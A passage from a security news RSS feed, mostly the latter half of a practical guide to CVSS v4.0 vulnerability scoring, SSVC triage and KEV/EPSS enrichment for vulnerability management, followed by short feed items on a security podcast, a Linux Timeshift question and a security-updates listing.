CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:H/VA:H/SC:H/SI:H/SA:H<br>Base Score: 9.3 Critical<br>OT environmental adjustment:<br>  MAV:A  - PLC on isolated OT VLAN, air-gapped from corporate<br>  MAC:H  - Access requires physical OT network entry (secured facility)<br>  CR:L   - Process data is non-sensitive<br>  IR:H   - Control integrity critical<br>  AR:H   - Process availability critical<br>  /S:P   - Physical safety implications (supplemental, not scored)<br>  /RE:H  - Patching requires production window, vendor support (supplemental)<br>BTE Score: ~7.8 High<br>Action: Schedule for next maintenance window (may be months away)<br>Interim mitigation: Network segmentation controls (document in CVSS-BTE)</pre><h4>Industry Scoring Profile Quick Reference</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tm9OPB1s40rEvjNIP2ARiQ.png"></figure><h3>CVSS vs SSVC: When to Use Which</h3><p><strong>SSVC (Stakeholder-Specific Vulnerability Categorization)</strong> is CISA’s decision-tree framework for vulnerability prioritization. It is an alternative (not replacement) to CVSS that uses a different model.</p><h4>How SSVC Works</h4><p>SSVC asks four questions in sequence, each with structured answers:</p><pre>1. Exploitation Status<br>   → None / POC / Active<br>   (same concept as CVSS E metric, but drives the whole tree)<br>2. Automatable<br>   → Yes / No<br>   (Can the vulnerability be exploited at scale without human interaction?)<br>3. Technical Impact<br>   → Partial / Total<br>   (Does exploitation give total system control or partial?)<br>4. Mission and Well-being Impact<br>   → Minimal / Material / Irreversible<br>   (What is the downstream organizational and human impact?)<br>Outputs (instead of a number): Track / Attend / Act / Immediate</pre><h4>CVSS vs SSVC Comparison</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/581/1*k_QWh3vzpMP0Ezy-dXLQXg.png"></figure><h4>When to Use Each</h4><p><strong>Use CVSS when:</strong></p><ul><li>Regulatory compliance requires it (PCI DSS, HIPAA, NIS2, NIST RMF)</li><li>You need a numeric score for SLA tracking and audit trails</li><li>You are integrating with SIEM, ticketing systems, or scanners that consume CVSS vectors</li><li>You need fine-grained documentation of WHY a vulnerability is de-prioritized</li><li>Supply chain transparency (SBOM, vendor contracts)</li></ul><p><strong>Use SSVC when:</strong></p><ul><li>You need rapid triage without deep metric analysis</li><li>Your team is small and lacks time for full CVSS-BTE enrichment</li><li>You are in a government/defense context where CISA guidance is authoritative</li><li>You want a clear output for non-technical stakeholders (“Act on this now” vs “Track it”)</li></ul><p><strong>Use both when:</strong></p><ul><li>CVSS-BTE for documentation, compliance, and audit</li><li>SSVC for team-level triage and prioritization decisions</li><li>Both frameworks reaching the same conclusion = high confidence</li></ul><p><strong>Example comparison — CVE-2023–4966 (CitrixBleed):</strong></p><pre>CVSS-BTE (internet-facing NetScaler, E:A):<br>  Score: 9.4 Critical<br>  SLA: Patch within 24 hours<br>  Documentation: vector string with E:A, justification for each metric<br>SSVC:<br>  Exploitation: Active<br>  Automatable: Yes (scanning was automated, documented)<br>  Technical Impact: Total (full session token theft)<br>  Mission/Well-being: Irreversible (customer data exposure, regulatory)<br>  → Decision: Immediate<br>Both outputs agree: drop everything, patch now.</pre><h3>The Practical VM Workflow: From Scanner Output to Prioritized Action</h3><h4>The 6-Step Process</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8a38jCuwENp5flLnmWAj7g.png"></figure><pre>┌───────────────────────────────────────────────────────────────┐<br>│             VULNERABILITY MANAGEMENT WORKFLOW (CVSS v4.0)     │<br>│                                                               │<br>│  Step 1: INGEST                                               │<br>│    Scanner Report → extract all CVE IDs + Base Vectors        │<br>│    (Tenable, Qualys, Rapid7, Wiz all export CVE IDs)          │<br>│                                                               │<br>│  Step 2: THREAT ENRICHMENT (automated, applies to all CVEs)   │<br>│    ┌─────────────────────────────────────────────────────┐    │<br>│    │ CISA KEV API → E:A if listed                        │    │<br>│    │ EPSS API → E:P if ≥ 0.1, E:U if &lt; 0.1               │    │<br>│    │ Override: E:A if KEV regardless of EPSS             │    │<br>│    └─────────────────────────────────────────────────────┘    │<br>│                                                               │<br>│  Step 3: ASSET GROUPING                                       │<br>│    Group CVEs by affected system/network zone                 │<br>│    Tag each group: zone, data class, compensating controls    │<br>│                                                               │<br>│  Step 4: ENVIRONMENTAL ENRICHMENT (per asset group)           │<br>│    ┌─────────────────────────────────────────────────────┐    │<br>│    │ Network zone → MAV value (N/A/L/P)                  │    │<br>│    │ Access controls → MAC value (L/H)                   │    │<br>│    │ Data classification → MVC/MVI values                │    │<br>│    │ Blast radius → MSC/MSI/MSA values                   │    │<br>│    │ Asset criticality → CR/IR/AR values                 │    │<br>│    └─────────────────────────────────────────────────────┘    │<br>│                                                               │<br>│  Step 5: RECALCULATE ALL SCORES                               │<br>│    CVSS v4.0 calculator API or FIRST.org calculator           │<br>│    Output: CVSS-BTE score per CVE per asset group             │<br>│                                                               │<br>│  Step 6: PRIORITIZE AND ACT (by CVSS-BTE)                     │<br>│    Critical (9.0+): 24–72 hours — emergency response          │<br>│    High (7.0–8.9):  30 days — planned sprint                  │<br>│    Medium (4.0–6.9): 90 days — next maintenance window        │<br>│    Low (&lt;4.0): Next major release / accept risk               │<br>└───────────────────────────────────────────────────────────────┘</pre><h3>CVSS v4.0 Enrichment Tool</h3><p>The pipeline described throughout this section is available as a standalone command-line tool: <a href="https://github.com/anpa1200/cvss_4.0"><strong>cvss_enrichment_tool</strong></a> (GitHub).</p><pre>git clone https://github.com/anpa1200/cvss_4.0.git <br>cd cvss_4.0<br>pip3 install requests<br>python3 cvss_enrichment_tool.py --cves CVE-2021-44228 CVE-2023-4966 --profile internet_facing</pre><h4>How It Works</h4><p>The tool implements the three-stage enrichment pipeline in a single automated run:</p><pre>CVE IDs → NVD API (Base vector) → CISA KEV (E:A?) → EPSS API (E:P/E:U?)<br>        → Apply asset profile (MAV/MAC/CR/IR/AR/MSC...)<br>        → Output CVSS-BTE vector + severity band + SLA recommendation</pre><p><strong>Stage 1 — Base vector (NVD API 2.0).</strong> For each CVE ID the tool queries services.nvd.nist.gov and retrieves the CVSS vector string. It prefers a v4.0 vector; if only a v3.1 vector exists (common for CVEs predating November 2023), it applies threat-only enrichment and flags the result for manual re-scoring at the FIRST.org calculator.</p><p><strong>Stage 2 — Threat enrichment (KEV + EPSS).</strong> The tool downloads the full CISA KEV catalog in a single request and checks each CVE against it. If listed → E:A. Otherwise it queries the FIRST.org EPSS API: EPSS ≥ 0.5 or ≥ 0.1 → E:P; below 0.1 → E:U.</p><p><strong>Stage 3 — Environmental enrichment (asset profile).</strong> Modified Base metrics and Security Requirements from the selected profile are appended to the vector. The tool ships with six built-in profiles — internet_facing, internal_vlan, isolated_ot, dev_test, healthcare_ehr, pci_payment — covering the most common deployment contexts described in this article.</p><h4>Output</h4><p>The tool prints a severity-ranked table and optionally writes CSV (--output) or JSON (--json) for import into ticket systems or dashboards:</p><pre>CVE                   CVSS   KEV     EPSS  E      Severity    SLA<br>──────────────────────────────────────────────────────────────────<br>CVE-2021-44228         3.1   YES   0.9446  E:A    Critical    24–72 hours<br>CVE-2023-4966          3.1   YES   0.9435  E:A    Critical    24–72 hours<br>CVE-2023-34362         3.1   YES   0.9437  E:A    Critical    24–72 hours<br>CVE-2024-21762         3.1   YES   0.9308  E:A    Critical    24–72 hours<br>CVE-2025-32433         3.1   YES   0.5031  E:A    Critical    24–72 hours</pre><p>Full documentation, profile definitions, and NVD API key instructions are in the repository README: <a href="https://github.com/anpa1200/cvss_4.0"><strong>https://github.com/anpa1200/cvss_4.0</strong></a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CkcYfsDiA-sSCgAXK0SMZg.png"></figure><h3>CVSS as Regulatory Framework: The 5-Phase Maturity Model</h3><p>The CVSS v4.0 lifecycle (CVSS-B → CVSS-BT → CVSS-BTE) maps directly to a regulatory maturity roadmap. This framework was formalized by Rob Arnold (Acorn Pass / CVSS Associates) in the whitepaper “Enhancing National Cyber Resilience: CVSS v4.0 as a Regulatory Framework” (2025).</p><h4>The 5 Phases + SCRM Track</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/571/1*Phjw6InMQW2DgUEy8TSPrg.png"></figure><h4>The Gaming Prevention Problem</h4><p>At Phase 5, CVSS-BTE scores can be lower than CVSS-B. This creates an incentive: organizations might manipulate Environmental metrics to claim compliance while leaving real vulnerabilities unaddressed.</p><p>The regulatory countermeasure:</p><p><strong>Auditors verify environmental claims against evidence:</strong></p><ul><li>MAV:A claimed → auditor validates against firewall rules, network diagrams, penetration test results</li><li>MAC:H claimed → auditor validates against policy documents, VPN logs, MFA enrollment records</li><li>MSC:N claimed → auditor validates against network topology and egress controls</li></ul><p><strong>Auditors verify response to changing E metrics:</strong></p><ul><li>If E:U was set last quarter and the CVE just entered CISA KEV, did the organization detect this change?</li><li>Did they update the E metric from U to A?</li><li>Did they escalate the remediation priority accordingly?</li></ul><p>The principle from the FIRST.org guide: <strong>CVSS-BTE scores are defensible precisely because they are documented and auditable. An organization cannot reduce a score without leaving an evidence trail that auditors can verify.</strong></p><p><strong>Regulatory Applications by Framework:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*VS6SyXxBQgVBvVK7Tgdqzw.png"></figure><h4>Supply Chain CVSS (SCRM Track)</h4><p>Organizations at Phase 5 embed CVSS requirements in supplier contracts:</p><pre>Example supplier contract language:<br>1. The Supplier shall disclose CVSS v4.0 Base vectors for all<br>   vulnerabilities in delivered software within 5 business days<br>   of CVE publication.<br>2. The Supplier shall provide software updates or documented<br>   mitigations sufficient to enable the Buyer to achieve a<br>   CVSS-BTE score of ≤ Medium (6.9) for all High or Critical<br>   Base vulnerabilities.<br>3. The Supplier shall include CVSS v4.0 vectors for all known<br>   vulnerabilities in all Software Bills of Materials (SBOMs).<br>4. The Supplier shall notify the Buyer within 24 hours if any<br>   vulnerability in delivered software enters the CISA KEV catalog.</pre><h3>Supplemental Metrics: The Overlooked Context Layer</h3><p>Supplemental metrics do not change the CVSS score. They add human-readable operational context that the numeric score cannot capture. Think of them as structured analyst notes attached to the vulnerability record.</p><h4>AU:Y — Automatable Exploitation</h4><p>AU:Y means an attacker can script the exploit to run against thousands of targets without human intervention. This is the worm-capability indicator.</p><p><strong>Why it matters beyond the CVSS score:</strong></p><p>Log4Shell (AU:Y) was being exploited by automated scanners within 24 hours of POC release. A CVSS-BTE score of 7.4 High with AU:Y requires faster response than an 8.0 High with AU:N that requires a custom, targeted attack chain.</p><p>Real examples with AU:Y:</p><ul><li>Log4Shell (CVE-2021–44228) — AU:Y: log any HTTP request, mass exploitation immediate</li><li>MOVEit Transfer (CVE-2023–34362) — AU:Y: Cl0p ran fully automated campaign</li><li>HTTP/2 Rapid Reset (CVE-2023–44487) — AU:Y: DDoS amplification automated</li><li>Heartbleed (CVE-2014–0160) — AU:Y: automated scanners ran within hours</li></ul><h4>S:P — Safety Impact in OT/Medical</h4><p>S:P (Safety: Present) flags that exploitation could result in physical harm to people or property. This metric is essential for:</p><ul><li>Industrial control systems (chemical plants, power grids, water treatment)</li><li>Medical devices (infusion pumps, ventilators, pacemakers)</li><li>Automotive systems (ECU vulnerabilities)</li></ul><pre>Example: Vulnerability in a pharmaceutical manufacturing control system<br>CVSS-BTE score: 5.9 Medium (due to MAV:A environmental adjustment)<br>Supplemental: /S:P (Safety: Present)<br><br>Without S:P context, this looks like a 90-day scheduled patch.<br>With S:P context, the medical device safety team must evaluate whether<br>the vulnerability could cause incorrect dosing, batch contamination,<br>or equipment failure - potentially regardless of the numeric CVSS score.</pre><h4>R:I — Irrecoverable Systems</h4><p>R:I (Recovery: Irrecoverable) means successful exploitation causes permanent damage that cannot be remediated without hardware replacement, data restoration from backup, or destructive re-imaging.</p><p><strong>Relevant scenarios:</strong></p><ul><li>Ransomware affecting backup systems (R:I — cannot restore without the backups)</li><li>Firmware corruption on embedded devices (R:I — requires physical device replacement)</li><li>Cryptographic key material theft (R:I — compromised keys cannot be “un-stolen”)</li><li>Industrial control setpoint modification causing equipment damage (R:I — physical damage)</li></ul><h3>The 8 Most Common CVSS Mistakes</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MkFQre3jSuIhOxGQVBdsEQ.png"></figure><h4>Mistake 1: Treating the Base Score as the Final Answer</h4><p>The Base score is produced by a vendor who has never seen your environment. It reflects the worst-case scenario for their entire customer base. For any specific deployment, it is almost always an overestimate. Always enrich with Threat and Environmental metrics before prioritizing remediation.</p><p><strong>What it looks like:</strong> Team sorts scanner output by Base score, assigns SLAs based on Critical/High/Medium bands from raw scanner, spends 90% of effort on low-risk vulnerabilities because their Base scores are high.</p><h4>Mistake 2: Never Setting E:U for CVEs Without Exploit Evidence</h4><p>Leaving E:X (Not Defined) means CVSS assumes every CVE is actively exploited. Given that ~95% of CVEs have no known working exploit, this guarantees your prioritization is inverted. Setting E:U for no-exploit CVEs is not optimism — it is accuracy and it is required for CVSS to function as a tool rather than a scare generator.</p><p><strong>The fix:</strong> Automate KEV + EPSS checks for all new CVEs. Default new CVEs without KEV or EPSS signal to E:U.</p><h4>Mistake 3: Applying the Same Environmental Profile to All Systems</h4><p>An internet-facing web application and an air-gapped industrial controller have entirely different attack vectors, compensating controls, and data sensitivity. Applying identical Environmental metrics to both produces inaccurate scores for both systems. Define asset groups and apply distinct profiles per group.</p><h4>Mistake 4: Not Documenting Environmental Adjustments</h4><p>If you lower a CVE from 9.8 to 4.2 using MAV:A/MAC:H/MSC:N but cannot produce evidence for each adjustment when an auditor asks, those adjustments provide no compliance value. Every Modified metric must cite a specific control, policy, network diagram, or asset classification document.</p><h4>Mistake 5: Confusing CVSS-BTE with Risk Score</h4><p>CVSS-BTE measures severity adjusted for your environment. It is not a risk score. A CVSS-BTE 5.0 Medium vulnerability on a system controlling a nuclear cooling pump may represent existential organizational risk. CVSS informs prioritization within a risk framework — it is not the risk framework itself. Overlay CVSS-BTE with asset criticality, business impact, and regulatory consequence to produce risk decisions.</p><h4>Mistake 6: Static Environmental Metrics</h4><p>Environmental metrics become stale the moment your environment changes. A system that was air-gapped (MAV:A justified) may have had a cloud management connector added three months later. The MAV:A you documented is now wrong, and your 4.5 Medium is actually an 8.9 High.</p><p><strong>The fix:</strong> Tie Environmental metric review to change management. Any change to a system’s network connections, access controls, or data classification should trigger a CVSS-BTE re-evaluation.</p><h4>Mistake 7: Using v3.x Vectors with v4.0 Tools (and Vice Versa)</h4><p>CVSS v4.0 vectors are incompatible with v3.x parsers. The S (Scope) metric from v3.x does not exist in v4.0; the dual-system impact model (VC/VI/VA + SC/SI/SA) does not exist in v3.x. Tools that parse v3.1 vectors will misinterpret v4.0 vectors and produce incorrect scores. Verify scanner, SIEM, and ticketing system compatibility with CVSS v4.0.</p><p><strong>Check your tools:</strong> As of early 2025, Tenable Nessus, Qualys VMDR, and Rapid7 InsightVM all publish CVSS v4.0 scores for new CVEs, but legacy integrations may still expose v3.1 scores by default. Check API output, not just UI display.</p><h4>Mistake 8: Treating CISA KEV as the Only Source of E:A</h4><p>CISA KEV is the best publicly available source for E:A determination, but it has coverage gaps. CISA focuses on US federal agency exposure; some CVEs exploited extensively in other regions or sectors may not appear in KEV. Supplement with:</p><ul><li>Vendor advisories that explicitly state “under active exploitation”</li><li>Commercial threat intelligence feeds (Mandiant, Recorded Future, Greynoise)</li><li>CERT/CC, national CERT advisories (CERT-EU, BSI, ANSSI)</li><li>Industry-specific ISACs (FS-ISAC for finance, H-ISAC for healthcare)</li></ul><h3>Quick Reference Cheatsheet</h3><h4>CVSS v4.0 Base Metrics — Complete Reference</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/511/1*kxsiKTOJOevS1TrQ_rs1gg.png"></figure><pre>ATTACK VECTOR (AV):<br>  N = Network     — Remotely exploitable from internet<br>  A = Adjacent    — Same network segment / LAN required<br>  L = Local       — Local interactive shell access required<br>  P = Physical    — Physical device access required<br>ATTACK COMPLEXITY (AC):<br>  L = Low   - Repeatable without special conditions; script it<br>  H = High  - Requires active bypass of security mechanisms (ASLR, race condition)<br>ATTACK REQUIREMENTS (AT):  [NEW in v4.0 - replaces part of old AC]<br>  N = None    - No special deployment configuration needed<br>  P = Present - Non-default config must be present in deployment<br>PRIVILEGES REQUIRED (PR):<br>  N = None  - Unauthenticated / pre-auth<br>  L = Low   - Regular user account<br>  H = High  - Administrator / root / privileged service account<br>USER INTERACTION (UI):<br>  N = None    - Attacker acts alone, no victim participation<br>  P = Passive - Victim views/receives something (opens page, email preview)<br>  A = Active  - Victim explicitly performs an action (clicks link, runs file)<br>VULNERABLE SYSTEM (VC/VI/VA):  [Replaces C/I/A in v3.x]<br>  N = None    H = High    L = Low<br>SUBSEQUENT SYSTEM (SC/SI/SA):  [Replaces Scope Changed in v3.x]<br>  N = None    H = High    L = Low</pre><h4>Exploit Maturity (E) — Decision Flowchart</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lh8yzf7Ov-0DYt0INQnnxA.png"></figure><pre>Is CVE in CISA KEV?<br>  → YES: E:A (Attacked) ─────────────────────────────────────────┐<br>  → NO: ↓                                                        │<br>                                                                 │<br>Is EPSS ≥ 0.10?                                                  │<br>  → YES (0.1–0.5): Verify ExploitDB/Metasploit/GitHub → E:P      │<br>  → YES (≥ 0.5):  High exploitation probability → E:P minimum    │<br>  → NO:  ↓                                                       │<br>                                                                 │<br>Is there a public exploit? (ExploitDB, Metasploit, GitHub)       │<br>  → YES: E:P (Proof of Concept)                                  │<br>  → NO:  E:U (Unreported)                                        │<br>                                                                 └→ Maximum priority, patch immediately</pre><h4>Environmental Metric Quick Decisions</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GHhF19IjqW-koABjMuvNRA.png"></figure><pre>"Is this system reachable from the internet?"<br>  YES → No AV change needed       NO → MAV:A (or L/P for more isolated)<br>"Does reaching this system require bypassing MFA/VPN/jump host?"<br>  YES → MAC:H                     NO → No AC change needed<br>"Does this system handle your most sensitive data?"<br>  NO → MVC:L (or N)              YES → No VC change, or set CR:H<br>"Can this system affect other systems if compromised?"<br>  NO → MSC:N/MSI:N/MSA:N        YES → No change, blast radius is real<br>"Is this a test/dev environment?"<br>  YES → CR:L/IR:L/AR:L           NO → Keep vendor defaults or raise CR/IR/AR</pre><h4>Score Impact Reference (Approximate)</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/945/1*r9N4JxU0lxHj7dUqbw9Bog.png"></figure><p><em>Note: CVSS v4.0 uses lookup tables, not formulas — these are empirical approximations.</em></p><h4>Common Vector String Examples</h4><pre># Worst case — all vendor defaults, no enrichment:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>→ 10.0 Critical<br># Internet-facing, actively exploited (CISA KEV):<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:A<br>→ 10.0 Critical (E:A maintains maximum - patch immediately)<br># Internet-facing, POC exists, not yet actively exploited:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P<br>→ ~8.4 High (7-day SLA)<br># Internal (adjacent network), POC exists, MFA VPN required:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/MAV:A/MAC:H<br>→ ~7.4 High (30-day SLA)<br># Internal, isolated (no subsequent system paths), no exploit evidence:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/MAV:A/MAC:H/MSC:N/MSI:N/MSA:N<br>→ ~4.5 Medium (90-day SLA)<br># OT sensor, adjacent network, non-sensitive data, no subsequent paths:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/MAV:A/MAC:H/CR:L/MSC:N/MSI:N/MSA:N<br>→ ~3.9 Low (next maintenance window)</pre><h4>SLA Tiers by CVSS-BTE Score</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BP4ZRBomA9ZjmLotmZ_drw.png"></figure><h3>Tools and Resources</h3><ul><li><a href="https://www.first.org/cvss/calculator/4-0">FIRST.org v4.0 Calculator</a></li><li><a href="https://nvd.nist.gov/vuln-metrics/cvss/v4-calculator">NVD Calculator</a></li><li><a href="https://services.nvd.nist.gov/rest/json/cves/2.0">NVD API — vector retrieval</a></li><li><a href="https://github.com/anpa1200/cvss_4.0">CVSS v4.0 Enrichment Tool — KEV + EPSS + BTE automation</a></li></ul><h4>Specification &amp; Guides</h4><ul><li><a href="https://www.first.org/cvss/v4-0/">CVSS v4.0 Specification</a></li><li><a href="https://www.first.org/cvss/v4.0/implementation-guide">Consumer Implementation Guide</a></li><li><a href="https://www.first.org/cvss/user-guide">CVSS v4.0 User Guide</a></li></ul><h4>Threat Intelligence</h4><ul><li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA KEV Catalog</a></li><li><a href="https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json">CISA KEV API (JSON feed)</a></li><li><a href="https://api.first.org/data/v1/epss?cve=CVE-XXXX-XXXXX">EPSS API</a></li><li><a href="https://www.exploit-db.com/">ExploitDB</a></li></ul><h4>Complementary Frameworks</h4><ul><li><a href="https://www.cisa.gov/sites/default/files/publications/cisa-ssvc-guide.pdf">SSVC Decision Guide (CISA)</a></li><li><a href="https://www.first.org/cvss/v4.0/implementation-guide">CVSS vs SSVC — Implementation Guide §4</a></li></ul><h3>Conclusion</h3><p>CVSS v4.0 answers the question that vulnerability managers have been asking for years: <em>“Why is my scanner showing 500 Critical vulnerabilities when I clearly cannot patch all of them this week?”</em></p><p>The answer is not that CVSS is broken. The answer is that CVSS Base scores were never intended to be your final answer. They are the starting point — a common language between a vendor who does not know your environment and a security team that does.</p><p>The three-layer model (CVSS-B → CVSS-BT → CVSS-BTE) gives your team the tools to translate a generic score into a deployment-specific one. Threat metrics (E + EPSS) eliminate the false urgency from the 95% of CVEs with no known exploit. Environmental metrics eliminate the false priority from scoring isolated systems as if they were internet-facing.</p><p>The real-world examples in this guide — Log4Shell, CitrixBleed, MOVEit, Erlang/OTP, firmware reports — illustrate both directions of this system. Sometimes (Log4Shell, CitrixBleed) the 10.0 score is correct, and environmental arguments are irrelevant: you patch immediately because active exploitation is confirmed and your exposure is real. Sometimes (internal OT sensor, air-gapped development system) a 9.8 Base score correctly becomes a 3.9 Low, not because the vulnerability is less dangerous, but because your deployment makes exploitation genuinely difficult and downstream impact genuinely limited.</p><p><strong>That is not gaming the system. That is using the system correctly.</strong></p><h3>References</h3><ol><li><strong>CVSS v4.0 Specification</strong> — FIRST.org: <a href="https://www.first.org/cvss/v4-0/">https://www.first.org/cvss/v4-0/</a></li><li><strong>CVSS v4.0 Consumer Implementation Guide</strong> — FIRST.org: <a href="https://www.first.org/cvss/v4.0/implementation-guide">https://www.first.org/cvss/v4.0/implementation-guide</a></li><li><strong>CVSS v4.0 User Guide</strong> — FIRST.org: <a href="https://www.first.org/cvss/user-guide">https://www.first.org/cvss/user-guide</a></li><li><strong>EPSS (Exploit Prediction Scoring System)</strong> — FIRST.org: <a href="https://www.first.org/epss/">https://www.first.org/epss/</a></li><li><strong>CISA Known Exploited Vulnerabilities Catalog</strong> — CISA: <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">https://www.cisa.gov/known-exploited-vulnerabilities-catalog</a></li><li><strong>SSVC (Stakeholder-Specific Vulnerability Categorization)</strong> — CISA: <a href="https://www.cisa.gov/ssvc">https://www.cisa.gov/ssvc</a></li><li><strong>NVD (National Vulnerability Database)</strong> — NIST: <a href="https://nvd.nist.gov/">https://nvd.nist.gov</a></li><li><strong>NVD API 2.0 Documentation</strong>: <a href="https://nvd.nist.gov/developers/vulnerabilities">https://nvd.nist.gov/developers/vulnerabilities</a></li><li><strong>CVE-2021–44228 (Log4Shell)</strong> — Apache: <a href="https://logging.apache.org/log4j/2.x/security.html">https://logging.apache.org/log4j/2.x/security.html</a></li><li><strong>CVE-2023–4966 (CitrixBleed)</strong> — Citrix: <a href="https://support.citrix.com/article/CTX579459">https://support.citrix.com/article/CTX579459</a></li><li><strong>CVE-2023–34362 (MOVEit SQLi)</strong> — Progress: <a href="https://www.progress.com/security">https://www.progress.com/security</a></li><li><strong>CVE-2024–21762 (FortiOS)</strong> — Fortinet: <a href="https://www.fortiguard.com/psirt/FG-IR-24-015">https://www.fortiguard.com/psirt/FG-IR-24-015</a></li><li><strong>CVE-2025–32433 (Erlang/OTP SSH)</strong> — Erlang security advisories: <a href="https://www.erlang.org/security">https://www.erlang.org/security</a></li><li><strong>“CVSS: A Scoring System or a Tool?”</strong> — Oren Yulevitch, CVSS SIG presentation</li><li><strong>“Enhancing National Cyber Resilience: CVSS v4.0 as a Regulatory Framework”</strong> — Rob Arnold, Acorn Pass / CVSS Associates (2025)</li><li><strong>Joint Advisory: Apache Log4j Vulnerability</strong> — CISA, FBI, NSA (December 2021): <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a">https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a</a></li><li><strong>CISA Advisory: Volt Typhoon</strong> (CVE-2024–21762 context): <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a">https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a</a></li></ol><h4><strong>Andrey Pautov</strong></h4><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5b5a59728456" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456">CVSS v4.0: The Practical Field Guide for Vulnerability Management</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stopping The Bad Things - Rob Allen - PSW #857]]></title>
<description><![CDATA[Rob from ThreatLocker comes on the show to talk about how we can disrupt attacker techniques, including Zero Trust, privilege escalation, LOLbins, and evil virtualization. In the news we talk about security appliances and vulnerabilities, rsync vulnerabilities, Shmoocon, hacking devices, and more...]]></description>
<link>https://tsecurity.de/de/3356374/it-security-nachrichten/stopping-the-bad-things-rob-allen-psw-857/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3356374/it-security-nachrichten/stopping-the-bad-things-rob-allen-psw-857/</guid>
<pubDate>Tue, 17 Mar 2026 18:00:21 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Rob from ThreatLocker comes on the show to talk about how we can disrupt attacker techniques, including Zero Trust, privilege escalation, LOLbins, and evil virtualization. In the news we talk about security appliances and vulnerabilities, rsync vulnerabilities, Shmoocon, hacking devices, and more!</p> <p>This segment is sponsored by ThreatLocker. Visit <a rel="noopener" target="_blank" href="https://securityweekly.com/threatlocker">https://securityweekly.com/threatlocker</a> to learn more about them!</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/psw">https://www.securityweekly.com/psw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/psw-857">https://securityweekly.com/psw-857</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Am I able to do this with Timeshift?]]></title>
<description><![CDATA[Preface: I'm relatively new to learning Linux but I've got my system decently customized and set up how I want it.  I currently have a desktop machine that I have been using but I would also like to set up my laptop with Linux and want it to be the same as how I currently have my desktop set up. ...]]></description>
<link>https://tsecurity.de/de/3344890/linux-tipps/am-i-able-to-do-this-with-timeshift/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3344890/linux-tipps/am-i-able-to-do-this-with-timeshift/</guid>
<pubDate>Thu, 12 Mar 2026 20:50:06 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Preface: I'm relatively new to learning Linux but I've got my system decently customized and set up how I want it. </p> <p>I currently have a desktop machine that I have been using but I would also like to set up my laptop with Linux and want it to be the same as how I currently have my desktop set up.</p> <p>I had a rough idea to load the same distro to the laptop, transfer over a Timeshift snapshot and restore it to the laptop to get it to the same point that my desktop is. </p> <p>I'm worried that it won't be that easy because of the differences in things like drive/partition names/sizes, different GPU drivers, etc. </p> <p>Would using rsync be a better choice?</p> <p>I've also considered making a github repo for my config files, cloning the repo to the laptop and then using <code>stow --adopt</code>. </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Booty4Breakfasts"> /u/Booty4Breakfasts </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1rs13ie/am_i_able_to_do_this_with_timeshift/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1rs13ie/am_i_able_to_do_this_with_timeshift/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by Debian (chromium), Fedora (freerdp, libsixel, opensips, and yt-dlp), Mageia (python-django, rsync, and vim), Red Hat (go-rpm-macros and osbuild-composer), SUSE (7zip, assertj-core, autogen, c3p0, cockpit-machines, cockpit, cockpit-repos, containerized-data-imp...]]></description>
<link>https://tsecurity.de/de/3330492/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3330492/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 06 Mar 2026 15:23:51 +0100</pubDate>
<category>🐧 Linux Tipps</category>
